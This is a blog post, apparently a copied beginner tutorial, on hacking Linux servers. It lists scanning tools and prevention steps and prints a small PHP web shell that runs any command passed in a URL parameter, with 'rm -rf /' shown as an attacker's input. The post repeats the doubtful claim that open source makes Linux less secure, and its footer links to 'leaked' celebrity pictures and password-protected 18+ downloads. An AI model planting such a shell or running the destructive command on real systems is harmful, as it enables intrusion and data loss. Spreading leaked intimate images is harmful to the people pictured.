Skip to main content

Linux

Hacking Linux Systems
Linux is the most widely used server operating system especially for web servers. It is open source; this means anybody can have access to the source code. This makes it less secure compared to other operating systems as attackers can study the source code to find vulnerabilities. Linux Hacking is about exploiting these vulnerabilities to gain unauthorized access to a system.
Quick Note on Linux
Linux is an open source operating system. There are many distributions of Linux based operating systems such as Redhat, Fedora, and Ubuntu etc. Unlike other operating system, Linux is less secure when it comes to security. This is because the source code is available freely so it is easy to study it for vulnerabilities and exploit them compared to other operating systems that are not open source. Linux can be used as a server, desktop, tablet, or mobile device operating system.
Linux programs can be operated using either GUI or commands. The commands are more effective and efficient compared to using the GUI. For this reason, it helps to know Linux basic commands.
Linux Hacking Tools
  • Nessus– this tool can be used to scan configuration settings, patches, and networks etc. it can be found athttp://www.tenable.com/products/nessus
  • NMap. This tool can be used to monitor hosts that are running on the server and the services that they are utilizing. It can also be used to scan for ports. It can be found at http://nmap.org/
  • SARA – SARA is the acronym for Security Auditor’s Research Assistant. As the name implies, this tool can be used to audit networks against threats such as sql Injection, XSS etc. it can be found at http://www-arc.com/sara/sara.html
  This is not complete, there are many other tools for this job

How to prevent Linux hacks
Linux Hacking takes advantage of the vulnerabilities in the operating system. An organization can adopt the following policy to protect itself against such attacks.
  1. Patch management– patches fix bugs that attackers exploit to compromise a system. A good patch management policy will ensure that you constantly apply relevant patches to your system.
  2. Proper OS configuration– other exploits take advantage of the weaknesses in the configuration of the server. Inactive user names and daemons should be disabled. Default settings such as common passwords to application, default user names and some port numbers should be changed.
  3. Intrusion Detection System– such tools can be used to detect unauthorized access to the system. Some tools have the ability to detect and prevent such attacks.
 Hack a Linux system using PHP
EXAMPLE :
This is basic information on how you can use PHP to compromise a Linux system. Do not going to target any victim. If you want to try it out, you can install LAMPP/XMAAPP on your local machine. 
PHP comes with two functions that can be used to execute Linux commands. It has exec() and shell_exec() functions. The function exec() returns the last line of the command output while the shell_exec() returns the whole result of the command as string.
Let’s assume the attacker managers to upload the following file on a web server.

<?php

$cmd = isset($_GET['cmd']) ? $_GET['cmd'] : 'ls -l';

echo "executing shell command:-> $cmd";

$output = shell_exec($cmd);

echo "<pre>$outpu</pre>";

?>

The above script gets the command from the GET variable named cmd. The command is executed using shell_exec() and the results returned in the browser.

The command executed against the server will be
shell_exec('ls -l') ;
The above command simply displays the files in the current directory and the permissions
Let’s suppose the attacker passes the following command
rm -rf /
  • “rm” removes the files
  • “rf” makes the rm command run in a recursive mode. Deleting all the folders and files
  • “/” instructs the command to start deleting files from the root directory
Summary
Linux is a popular operating system for servers, desktops, tablets and mobile devices.
Linux is open source and the source code can be obtained by anyone. This makes it easy to spot the vulnerabilities.
Basic and networking commands are valuable to Linux hackers.
Vulnerabilities are weakness that can be exploited to compromise a system.
A good security can help to protect a system from been compromised by an attacker.

Comments

Popular posts from this blog

deep web girl pictures

Emma Watson leaked pictures :D

Emma Watson 3

Emma Watson 2

15 Anime girl on the dark web.

11 interest picture on the deep web

Victoria Justice leaked pictures

download 18+++++++++++++++++ pic Password:ilikedeepweb

26 random beautiful girl picture :P

Becca Tobin

LINK OTHER PIC 18++++++++++++++++++++++++++++++ Password: ilikedeepweb

weapon + girl :D